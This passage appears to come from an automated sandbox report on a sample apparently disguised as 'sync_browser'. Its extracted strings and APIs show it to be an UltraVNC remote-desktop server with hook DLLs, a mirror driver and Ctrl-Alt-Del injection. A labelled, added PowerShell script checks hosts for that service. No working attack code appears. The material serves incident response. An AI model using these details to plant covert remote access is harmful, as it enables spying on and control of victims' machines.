                                                                    • String ID: bad allocation
                                                                    • API String ID: 3727741168-2104205924
                                                                    APIs
                                                                    Strings
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FindMessagePostWindow
                                                                    • String ID: WinVNC Tray Icon
                                                                    • API String ID: 2578315405-1071638575
                                                                    APIs
                                                                    Strings
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: closesocketshutdown
                                                                    • String ID: vsocket.cpp : closing socket
                                                                    • API String ID: 572888783-2569437896
                                                                    APIs
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseErrorHandleLast
                                                                    • String ID:
                                                                    • API String ID: 918212764-0
                                                                    APIs
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: selectsend
                                                                    • String ID:
                                                                    • API String ID: 2999949978-0
                                                                    APIs
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocHeap_callnewh_errno
                                                                    • String ID:
                                                                    • API String ID: 849339952-0
                                                                    APIs
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeLibraryMessageSend
                                                                    • String ID:
                                                                    • API String ID: 3583424976-0
                                                                    APIs
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: closesocketsetsockoptshutdownsocket
                                                                    • String ID:
                                                                    • API String ID: 3513852771-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: setsockopt
                                                                    • String ID:
                                                                    • API String ID: 3981526788-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: CountTickselect
                                                                    • String ID:
                                                                    • API String ID: 2475007269-0
                                                                    APIs
                                                                    • Sleep.KERNEL32(?,?,?,00007FF6DC1837F7,?,?,?,00007FF6DC17FFD1,?,?,?,?,00007FF6DC178C19), ref: 00007FF6DC183331
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Sleep_errno
                                                                    • String ID:
                                                                    • API String ID: 1068366078-0
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: PrivateProfile$String$Write$Desktop$Threadwsprintf$FileModuleName$CloseCurrentErrorInputLastMessageOpen_errno_invalid_parameter_noinfo
                                                                    • String ID: $AllowEditClients$AllowLoopback$AllowProperties$AllowShutdown$AuthHosts$AuthRequired$AutoPortSelect$Avilog$BlankInputsOnly$BlankMonitorEnabled$ConnectPriority$DSMPlugin$DSMPluginConfig$DebugLevel$DebugMode$DefaultScale$DisableTrayIcon$EnableDriver$EnableHook$EnableJapInput$EnableVirtual$FTUserImpersonation$FileTransferEnabled$HTTPConnect$HTTPPortNumber$IdleTimeout$InputsEnabled$LocalInputsDisabled$LockSetting$LoopbackOnly$MSLogonRequired$MaxCpu$NewMSLogon$OnlyPollConsole$OnlyPollOnEvent$Permission denied:Uncheck [_] Protect my computer... in run as dialog or use user with write permission.$PollForeground$PollFullScreen$PollUnderCursor$PortNumber$QueryAccept$QueryIfNoLogon$QuerySetting$QueryTimeout$RemoveAero$RemoveWallpaper$SingleWindow$SingleWindowName$SocketConnect$TurboMode$UltraVNC$UseDSMPlugin$UseRegistry$XDMCPConnect$accept_reject_mesg$admin$admin_auth$clearconsole$group1$group2$group3$kickrdp$locdom1$locdom2$locdom3$passwd$passwd2$path$poll$primary$secondary
                                                                    • API String ID: 634683900-3478490838
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: PrivateProfile$String$Write$Desktopwsprintf$Thread$CloseCurrentErrorInputLastMessageOpen_callnewh_itowmallocxtoa
                                                                    • String ID: $AllowEditClients$AllowLoopback$AllowProperties$AllowShutdown$AuthHosts$AuthRequired$AutoPortSelect$Avilog$BlankInputsOnly$BlankMonitorEnabled$ConnectPriority$DSMPlugin$DebugLevel$DebugMode$DefaultScale$DisableTrayIcon$EnableDriver$EnableHook$EnableJapInput$EnableVirtual$FTUserImpersonation$FileTransferEnabled$FileTransferTimeout$HTTPConnect$HTTPPortNumber$IdleTimeout$InputsEnabled$LocalInputsDisabled$LockSetting$LoopbackOnly$MSLogonRequired$MaxCpu$NewMSLogon$OnlyPollConsole$OnlyPollOnEvent$PollForeground$PollFullScreen$PollUnderCursor$PortNumber$QueryAccept$QueryIfNoLogon$QuerySetting$QueryTimeout$RemoveAero$RemoveWallpaper$SingleWindow$SingleWindowName$SocketConnect$TurboMode$UltraVNC$UseDSMPlugin$UseRegistry$XDMCPConnect$accept_reject_mesg$admin$admin_auth$clearconsole$group1$group2$group3$kickrdp$locdom1$locdom2$locdom3$passwd$passwd2$path$poll$primary$secondary
                                                                    • API String ID: 341937111-959611688
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: AddressProc$Library$Event$DesktopThread$LoadMessageWindow$CreateFileFreeModuleNameObject$CloseCriticalDestroySectionTimer$ClassClipboardCombineCurrentDeleteDispatchEnterHandleInformationInputKillLeaveLongOpenPeekRectRegisterSleepStockTranslateUserViewerWaitfree
                                                                    • String ID: CaptureW8$ChangeWindowMessageFilter$SetHook$SetHooks$SetKeyboardFilterHook$SetMouseFilterHook$StartW8$StopW8$UnSetHook$UnSetHooks$WinVNC$WinVNC desktop sink$\schook64.dll$\vnchooks.dll$\w8hook64.dll$user32.dll$vncdesktopsink.cpp : InitWindow called$vncdesktopsink.cpp : InitWindow:!GetUserObjectInformation $vncdesktopsink.cpp : InitWindow:OpenInputdesktop Error $vncdesktopsink.cpp : InitWindow:OpenInputdesktop OK$vncdesktopsink.cpp : InitWindow:SelectHDESK to %s (%x) from %x$vncdesktopsink.cpp : InitWindow:SelectHDESK:!SetThreadDesktop $vncdesktopsink.cpp : OOOOOOOOOOOO %i %i$vncdesktopsink.cpp : OOOOOOOOOOOO called wm_quit$vncdesktopsink.cpp : OOOOOOOOOOOO called wm_user+3$vncdesktopsink.cpp : OOOOOOOOOOOO called wm_user+4$vncdesktopsink.cpp : OOOOOOOOOOOO end dispatch$vncdesktopsink.cpp : OOOOOOOOOOOO load hookdll's$vncdesktopsink.cpp : OOOOOOOOOOOO start dispatch$vncdesktopsink.cpp : REct3 %i %i %i %i $vncdesktopsink.cpp : RFB_MOUSE_UPDATE $vncdesktopsink.cpp : RFB_SCREEN_UPDATE $vncdesktopsink.cpp : failed to create hook window$vncdesktopsink.cpp : failed to register window class$vnchook
                                                                    • API String ID: 3632263120-2889214834
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: DesktopOpen$Close$EventThread$HandleProcess$FileModuleNameUser$CreateCriticalCurrentErrorExecuteInformationInitializeInputLastObjectQuerySectionShellSleepTokenValueVersionWindow
                                                                    • String ID: -softwarecadhelper$Ctrl-alt-del require service, no permission$Ctrl-alt-del require service, no permission$EnableLUA$Global\SessionEventUltraCad$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$UAC is Disable, make registry changes to allow cad$UltraVNC Warning$Warning$Winsta0\Default$cad.exe$open$vistahook.cpp : !GetUserObjectInformation $vistahook.cpp : OpenInputdesktop Error $vistahook.cpp : OpenInputdesktop OK$vistahook.cpp : SelectHDESK to %s (%x) from %x$vistahook.cpp : SelectHDESK:!SetThreadDesktop
                                                                    • API String ID: 1732492099-311746058
                                                                    APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
• Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
Yara matches
Similarity
• API ID: CloseHandleSleep$Event$PrivateProfileWait$CreateFileLibraryModuleNameObjectOpenSingle$AddressCodeDesktopExecuteExitFreeLoadMultipleObjectsProcProcessShellStringVersionWindow
• String ID: Global\SessionEventUltra$Global\SessionEventUltraCad$SendSAS$cad.exe$open$sas.dll
• API String ID: 767217470-2348971971
• Opcode ID: 7d4960000cb2e9cc34650905f6e7b06f80ef93b8f83e24dd9411a62a6d9a1cef
• Instruction ID: 6f5a0aad477a4efd42a458ce684a076b13064ed261969a54d64fc1e674426391
• Opcode Fuzzy Hash: 7d4960000cb2e9cc34650905f6e7b06f80ef93b8f83e24dd9411a62a6d9a1cef
• Instruction Fuzzy Hash: 18C19E25A0DB5A82FA169B61AD5027D23A8FF84B50F040237D96EC37A4CF3DE867C741
APIs
Strings
Yara matches
Similarity
• API ID: CapsCompatibleCreateDeviceEnumErrorLastLibrary$AddressBitmapBitsDisplayFreeLoadProcSettingsWindows
• String ID: DISPLAY$EnumDisplayDevicesA$USER32$WinVNC$mv video hook driver2$vncDesktop : memory device doesn't support GetDIBitsWinVNC cannot be used with this graphics device driver$vncDesktop : root device doesn't support BitBltWinVNC cannot be used with this graphic device driver$vncdesktop.cpp : Failed m_rootdc $vncdesktop.cpp : No driver used $vncdesktop.cpp : bitmap dimensions are %d x %d$vncdesktop.cpp : created memory bitmap$vncdesktop.cpp : failed to DeleteDC hrootdc$vncdesktop.cpp : failed to create compatibleDC(%d)$vncdesktop.cpp : failed to create memory bitmap(%d)$vncdesktop.cpp : got bitmap format$vncdesktop.cpp : unable to get display colour info$vncdesktop.cpp : unable to get display format
• API String ID: 3851920378-1343955350
• Opcode ID: 64e6ac3a7bdcde4c20c39546ebbbec1b22000b0516b3881d6d9525ff59da856e
• Instruction ID: 8dcb68913c4853c4730f03e4c91ad329f5603ecffcb570ea4af7203243c62977
• Opcode Fuzzy Hash: 64e6ac3a7bdcde4c20c39546ebbbec1b22000b0516b3881d6d9525ff59da856e
• Instruction Fuzzy Hash: B8026D72A086DA85EB10DF24D8546AD37A9FF88B48F484537DA0DD7298DF3DE126C720
APIs
Strings
Yara matches
Similarity
• API ID: CloseDesktop$CreateThread$DisplaySettings$ChangeLibraryValuewprintf$AddressCurrentEnumFreeInputLoadOpenProc
• String ID: Attach.ToDesktop$DEVICE0$DevNum:%dName:%sString:%sID:%sKey:%s$EnumDisplayDevicesA$No '%s' found.$SYSTEM$SYSTEM\CurrentControlSet\Hardware Profiles\Current$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Services\mv2$USER32$\DEVICE$mv video hook driver2$mv2
• API String ID: 4207610217-3713657650
• Opcode ID: cd3cd2c9535241abd372aab497dfb4bd752fa0a5a9763d12b3f41f1bb9d769e3
• Instruction ID: 92aa8f45efa1e3f14a37d36a8143c1cb312ea26d8571b99ede306d5606628a90
• Opcode Fuzzy Hash: cd3cd2c9535241abd372aab497dfb4bd752fa0a5a9763d12b3f41f1bb9d769e3
• Instruction Fuzzy Hash: 32C18261A18B9A85FB508F25E8407BD63A8FF84794F444237DA5E87A94DF3CD12BC740
APIs
Strings
Yara matches
Similarity
• API ID: Window$Item$ProcessText$DialogForeground$CurrentLongMessageThreadsprintf$ActiveBeepDeleteFileFlashImageLoadModuleNameObjectPrivateProfileSendStringTimer
• String ID: AutoAccept: %u$AutoAccept:%u$AutoReject: %u$AutoReject:%u$\mylogo.bmp$accept_reject_mesg$admin
• API String ID: 384463373-239428621
• Opcode ID: 9150f81c6ab9d50a8e6c44e1eba6f8074f889bee52a31bd6a7df91507269a3b3
• Instruction ID: ec17e3db53a86b9cb8de494ca3128b1d62eb300df751656eae4578a231907188
• Opcode Fuzzy Hash: 9150f81c6ab9d50a8e6c44e1eba6f8074f889bee52a31bd6a7df91507269a3b3
• Instruction Fuzzy Hash: F3B1A431A08A5A82FB248B24E8043BD63A5FFC5764F545133DA5E83A94DF3DE567CB40
APIs
Strings
Yara matches
Similarity
• API ID: Delete$Object$Palette$ErrorLast$Select$CreateEntriesSystem$ColorCompatibleRealizeTable
• String ID: vncdesktop.cpp : framebuffer has %u palette entries$vncdesktop.cpp : initialised palette OK$vncdesktop.cpp : no palette data for truecolour display$vncdesktop.cpp : unable to allocate logical palette$vncdesktop.cpp : unable to create HPALETTE$vncdesktop.cpp : unable to create temporary DC$vncdesktop.cpp : unable to get system palette entries$vncdesktop.cpp : unable to restore temporary DC bitmap$vncdesktop.cpp : unable to select DIB section into temporary DC$vncdesktop.cpp : unable to select() HPALETTE$vncdesktop.cpp : unable to set DIB section palette$vncdesktop.cpp : warning - failed to RealizePalette
• API String ID: 463275814-2693335352
• Opcode ID: aa26c122d741df029fa551308a4514e6f6df226472759b8381794094a4369389
• Instruction ID: 6c08651bcc6e35b56b24d799e31aa8e4506c6344b2a8a9a6020f79da2f239ec1
• Opcode Fuzzy Hash: aa26c122d741df029fa551308a4514e6f6df226472759b8381794094a4369389
• Instruction Fuzzy Hash: DFA19D61A1DA9B85FA10DB2598043FD23A5EF89B48F448533C94EC72A5DF3DE06BC740
APIs
Strings
Yara matches
Similarity
• API ID: Desktop$Thread$CloseDisplayLibrarySettings$ChangeCreateFreewprintf$AddressCurrentEnumInputLoadOpenProcValue
• String ID: Attach.ToDesktop$DEVICE0$DevNum:%dName:%sString:%sID:%sKey:%s$EnumDisplayDevicesA$No '%s' found.$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Services\mv2$USER32$\DEVICE$mv video hook driver2$mv2
• API String ID: 27940619-3388178877
• Opcode ID: 0339ce360284387b53255601b05480dca21fa52ca98469070f8d84e277019744
• Instruction ID: 0215c05fbb0b8fbdf7cebc39fe8e9d1d678a91232f411a7b1e4b2394d69710ad
• Opcode Fuzzy Hash: 0339ce360284387b53255601b05480dca21fa52ca98469070f8d84e277019744
• Instruction Fuzzy Hash: 75C1A032A0869A85FB10CF25E8447AD77A5FB84798F444136DA4E87A94EF3DE52BC700
APIs
Strings
Yara matches
Similarity
• API ID: Time$File$_errno$FindLocalSystem__doserrno$Closefree$DriveErrorFirstLastType_getdrive_invalid_parameter_noinfo_wsopen_s
• String ID: ./\
• API String ID: 385398445-3176372042
• Opcode ID: 5df5ab07e8b10f5b0de6cac4ab10895aae674884ac327e352a221a4cbdc82de0
• Instruction ID: d96c9987a50940aaee7b0bb32b00ec2f18d1097a1a7092ac7ad5ceb2b148f3d6
• Opcode Fuzzy Hash: 5df5ab07e8b10f5b0de6cac4ab10895aae674884ac327e352a221a4cbdc82de0
• Instruction Fuzzy Hash: BDE1A522D0C26AC6E6609F21E85427E77A8FF45740F645036EA8D93AC5DF3DE47ADB00
APIs
Yara matches
Similarity
• API ID: Clipboard$CloseEmptyOpen
• String ID:
• API String ID: 1427272684-0
• Opcode ID: 71ad19a431d06b663c1a9cd73ece8f0cf1ab1915d908a295cc5594be5b48716c
• Instruction ID: d5574cb100b0c54b0008c023d3857cc02cb503aa3751648eab20dc1491a50551
• Opcode Fuzzy Hash: 71ad19a431d06b663c1a9cd73ece8f0cf1ab1915d908a295cc5594be5b48716c
• Instruction Fuzzy Hash: 7CC18E21B09B1A96FB24DF65E9542BD63A4AF49B84F440036CE1E837A5EF3DE427C350
APIs
Strings
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Create$Event$Rect$CriticalInitializeSection$AddressLibraryLoadProcTimemalloctime
                                                                    • String ID: BlockInput$USER32$mouseupdate$quit$restart$screenupdate$timer$user1$user2
                                                                    • API String ID: 33112563-1779637096
                                                                    • Opcode ID: 12d9c60dc68b12f73036889b8d411b766d5b4a22eba2f64e6bf1725f4b1690ab
                                                                    • Instruction ID: 38ddebb1b3c7e0396b4eb789fd53a43d7372ed50998e2932a87f6574a04f7e33
                                                                    • Opcode Fuzzy Hash: 12d9c60dc68b12f73036889b8d411b766d5b4a22eba2f64e6bf1725f4b1690ab
                                                                    • Instruction Fuzzy Hash: 89B11932508BD98AE3288F64F85479EB7A8FB44B04F94453AC7EA86250DF7DF066C714
APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
Yara matches
Similarity
• API ID: CreateObjectTimetime$CapsCompatibleDeleteDevice$BitmapBitsSelect$PixelReleaseSection
• String ID: $benchmark.cpp : Blit time %i Getpixeltime %i Use getpixel= %i
• API String ID: 2697070071-1399849103
• Opcode ID: c75ecaf3627e65a832fba3c338a4f14dfa2348597fa0c2e187d05a457d19dc9d
• Instruction ID: 6f6277ee4cb8805be113bab3ffd3a62bdf5391648df127879392ea84986d9318
• Opcode Fuzzy Hash: c75ecaf3627e65a832fba3c338a4f14dfa2348597fa0c2e187d05a457d19dc9d
• Instruction Fuzzy Hash: 6B81937561869A86EB148F21AC0466E73A9FB88B91F485136DD5EC7B64DF3CE026C700
APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
Yara matches
Similarity
• API ID: Find$CloseDesktopDriveErrorFileMode$CriticalFirstFolderFromInputLeaveListLocationLogicalMallocNextOpenPathSectionSpecialStringsTypelstrlen
• String ID: Desktop$My Documents$Network Favorites$f$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
• API String ID: 2965397059-206656798
• Opcode ID: 2db8000c453640fe1383c1b2e2e44d3cb64826df7eb8e4b981688ca979fb9bf6
• Instruction ID: 6140e8845c6e68572492965c9da6f59b773d4802c2267aef63588d45aa45e793
• Opcode Fuzzy Hash: 2db8000c453640fe1383c1b2e2e44d3cb64826df7eb8e4b981688ca979fb9bf6
• Instruction Fuzzy Hash: E342F522A0869A85FB608B39C8583FD27A9EB85B98F540237CA1DC76D5CF3DE556C700
APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
Yara matches
Similarity
• API ID: ErrorFileLast$LibraryProcessSleep$AddressByteCharCloseCreateCurrentDirectoryFreeHandleLoadMultiNamedOpenPipeProcReadSystemWaitWideWritelstrcatsprintf_s
• String ID: WinStationQueryInformationW$Winsta0\Winlogon$\\.\Pipe\TerminalServer\SystemExecSrvr\%d$\winsta.dll
• API String ID: 2145620463-2328478964
• Opcode ID: 3526ed3cabb8580e2c2a759d620c59a707cfd12fe60383a580afbdfaae7cafc6
• Instruction ID: ac28d3dccaf8af8497eaa763087a48cc171c1428ced0bb654e006d92e14d3752
• Opcode Fuzzy Hash: 3526ed3cabb8580e2c2a759d620c59a707cfd12fe60383a580afbdfaae7cafc6
• Instruction Fuzzy Hash: C0E1F632A0869A85F7208F64E8447BD73A4FF847A8F400236DA5E87A94DF3DD667C740
APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
Yara matches
Similarity
• API ID: System$InfoMetricsParameters$Desktopmouse_event$CloseCursorInputOpen
• String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
• API String ID: 246551654-3977938048
• Opcode ID: 8a846c19ca448c6dfd4fc0fae66a9b6d9b90a853b31161baa3ad83bdd6464dec
• Instruction ID: b616019a2ee50dac9f15d373ddadd4ec2ffba0f7bcbe4d2e7e589ab758c60036
• Opcode Fuzzy Hash: 8a846c19ca448c6dfd4fc0fae66a9b6d9b90a853b31161baa3ad83bdd6464dec
• Instruction Fuzzy Hash: 9722D032A0869586F7648B65C8587FE37A9FB85B48F054136CA4DC77A4CF3EE466C700
APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
Yara matches
Similarity
• API ID: Desktop$DisplayLibrarySettingsThread$Free$ChangeEnum$AddressCloseCurrentInputLoadOpenProc
• String ID: $DEVICE0$EnumDisplayDevicesA$USER32$\DEVICE$mv video hook driver2$mv2
• API String ID: 1729393483-4131161223
• Opcode ID: 8fb70b05fa99fe765fa15744f32cba980a912edec1c339e6501a40cc58f4b770
• Instruction ID: a47f77b6efd51d6e425d5bf55459e7cd25c17de6151842036b05247f22b6f38d
• Opcode Fuzzy Hash: 8fb70b05fa99fe765fa15744f32cba980a912edec1c339e6501a40cc58f4b770
• Instruction Fuzzy Hash: D8B1CF32A0869A86FB608F25A8407BD73A4FF84754F480236DA5E97A84DF3DE527C740
APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
Yara matches
Similarity
• API ID: Library$Free$AddressCreateDeleteDisplayEnumLoadProcSettings
• String ID: access denied, permission problem$ access ok$ driver Active$1.00.22$DISPLAY$Driver Not Activated, is the viewer current connected ?$Driver not found: Perhaps you need to reboot after install$Driver verion is not 1.00.22 $Driver version OK $EnumDisplayDevicesA$Is winvnc started with run as admin, no permission to start mirror driver? $USER32$driver info: required version 1.00.22$mv video hook driver2$mv2.dll
• API String ID: 524771730-2664985301
• Opcode ID: 7362158d55f1d2d21951a1544e2162c6409f4db9c5e1fad95bfb36cdb45f3486
• Instruction ID: 935dbd310b567dd9ef74700a5893433e3f3de814c9b9275450fdae9e71b7da90
• Opcode Fuzzy Hash: 7362158d55f1d2d21951a1544e2162c6409f4db9c5e1fad95bfb36cdb45f3486
• Instruction Fuzzy Hash: 90D13A35A09B9A95E7548B25AD4066D37A4FB88364F404237DA6DC3BA0DF3CE53BC701
APIs
• OpenSCManagerA.ADVAPI32 ref: 00007FF6DC0D2E5D
• OpenServiceA.ADVAPI32 ref: 00007FF6DC0D2EAD
• GetLastError.KERNEL32 ref: 00007FF6DC0D2EBB
• CloseServiceHandle.ADVAPI32 ref: 00007FF6DC0D2EE0
  • Part of subcall function 00007FF6DC0CA040: OpenInputDesktop.USER32(?,?,?,00007FF6DC0C82D7), ref: 00007FF6DC0CA07A
  • Part of subcall function 00007FF6DC0CA040: GetCurrentThreadId.KERNEL32 ref: 00007FF6DC0CA083
  • Part of subcall function 00007FF6DC0CA040: GetThreadDesktop.USER32(?,?,?,00007FF6DC0C82D7), ref: 00007FF6DC0CA08B
  • Part of subcall function 00007FF6DC0CA040: SetThreadDesktop.USER32(?,?,?,00007FF6DC0C82D7), ref: 00007FF6DC0CA0A6
  • Part of subcall function 00007FF6DC0CA040: MessageBoxA.USER32 ref: 00007FF6DC0CA0B7
  • Part of subcall function 00007FF6DC0CA040: SetThreadDesktop.USER32(?,?,?,00007FF6DC0C82D7), ref: 00007FF6DC0CA0C2
  • Part of subcall function 00007FF6DC0CA040: CloseDesktop.USER32(?,?,?,00007FF6DC0C82D7), ref: 00007FF6DC0CA0CB
Strings
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
Yara matches
Similarity
• API ID: Desktop$Thread$Open$CloseService$CurrentErrorHandleInputLastManagerMessage
• String ID: Failed to delete the service$Failed to open service control manager$Failed to open the service$Failed to query service status$Failed: Permission denied$UltraVNC$uvnc_service
• API String ID: 1921882253-4018834470
• Opcode ID: 89c88f06f4114718cce365b56f1f704feee2962acf5f53bddd364f3665430f83
• Instruction ID: 12f1013cfeb58310affb623ab323bb737f2ef511d333c2daecc975dcdd93bc01
• Opcode Fuzzy Hash: 89c88f06f4114718cce365b56f1f704feee2962acf5f53bddd364f3665430f83
• Instruction Fuzzy Hash: 31414221A0C66F82FA159B11EC542BC2365FF89B94F440037D91EC6654EF3DE96B8741
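The routine above opens the service control manager and the "uvnc_service" service (display name "UltraVNC") in order to delete it, and the earlier entries show the same binary probing for the "mv video hook driver2" mirror driver (mv2.dll) and complaining when "winvnc" is not started as admin. Those strings give a responder three host-side artifacts to look for. The PowerShell triage check below is an added example, not part of the Joe Sandbox report or of the UltraVNC project: the service name, display name, driver name and winvnc process name are taken from the report's string tables, while the "expected" install roots under Program Files and the assumption that the mirror driver's name surfaces in Win32_VideoController are assumptions of the example.

```powershell
# Added triage check, not from the Joe Sandbox report or the UltraVNC project.
# Indicators come from the report's string tables; the install roots are an assumption.

$serviceName   = 'uvnc_service'                                  # from the String ID above
$expectedRoots = @($env:ProgramFiles, ${env:ProgramFiles(x86)})  # assumption: where a legitimate install lives

function Get-ServiceImagePath {
    param([string]$PathName)
    # PathName is the raw registry value: possibly quoted, possibly followed by arguments (e.g. -service)
    if ($PathName -match '^"([^"]+)"')  { return $Matches[1] }
    if ($PathName -match '^(\S+?\.exe)') { return $Matches[1] }
    return $PathName
}

$svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='$serviceName'" -ErrorAction SilentlyContinue
if (-not $svc) {
    Write-Output "[-] no service named '$serviceName' is registered"
} else {
    $image      = Get-ServiceImagePath -PathName $svc.PathName
    $inExpected = $false
    foreach ($root in $expectedRoots) {
        if ($root -and $image.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) { $inExpected = $true }
    }
    $flag = if ($inExpected) { '+' } else { '!' }
    Write-Output "[$flag] $($svc.Name) ('$($svc.DisplayName)') state=$($svc.State) start=$($svc.StartMode) image=$image"
    if (-not $inExpected) { Write-Output "    image path is outside Program Files; verify it before trusting it" }
    if (Test-Path -LiteralPath $image) {
        $sig = Get-AuthenticodeSignature -FilePath $image
        Write-Output "    signature: $($sig.Status) $($sig.SignerCertificate.Subject)"
        Write-Output "    sha256:    $((Get-FileHash -Algorithm SHA256 -LiteralPath $image).Hash)"
    }
}

# Mirror driver probe: the sample enumerates display devices for "mv video hook driver2" (mv2.dll).
# Assumption: when the driver is installed, that name appears in the WMI video controller view.
Get-CimInstance -ClassName Win32_VideoController |
    Where-Object { ($_.Name + ' ' + $_.Description) -match 'mv video hook' } |
    ForEach-Object { Write-Output "[!] mirror driver present: $($_.Name)" }

# Live winvnc.exe instances and the path each was started from
Get-Process -Name winvnc -ErrorAction SilentlyContinue |
    ForEach-Object { Write-Output "[!] winvnc.exe pid=$($_.Id) path=$($_.Path)" }
```

Run it from an elevated prompt on the host under investigation; an image path outside Program Files, an unsigned or unexpected signer on the service binary, or a winvnc.exe running without a registered service are the findings worth escalating. The Win32_VideoController match is best-effort: a mirror driver that is installed but not activated may not be listed, so an empty result does not clear the host.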
APIs
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
Yara matches
Similarity
• API ID: Global$Clipboard$AvailableByteCharDataFormatLockMultiSizeUnlockWide$Open
• String ID:
• API String ID: 1939172783-0
• Opcode ID: 0b3bb09cbdecdb7f57cc64d09ea6752ff0ca7fb8838ecbd0261cdb65b0b51056
• Instruction ID: 07f7945227602fac20e7bf4f47f689751424a50b27a3cdc52cc6672e7fa6c30e
• Opcode Fuzzy Hash: 0b3bb09cbdecdb7f57cc64d09ea6752ff0ca7fb8838ecbd0261cdb65b0b51056
• Instruction Fuzzy Hash: AE812A21A0975A86EA54AF22AE5026D23A8FF45B90F044136DE5EC77A1EF3CE476C704
                                                                    APIs
                                                                    Strings
                                                                    • HideDesktop.cpp : Failed to set SPI value for SPI_SETFONTSMOOTHING (0x%08x), xrefs: 00007FF6DC0CAB1D
                                                                    • HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHINGTYPE (0x%08x), xrefs: 00007FF6DC0CA9BB
                                                                    • HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHING: 0x%08x, xrefs: 00007FF6DC0CA97B
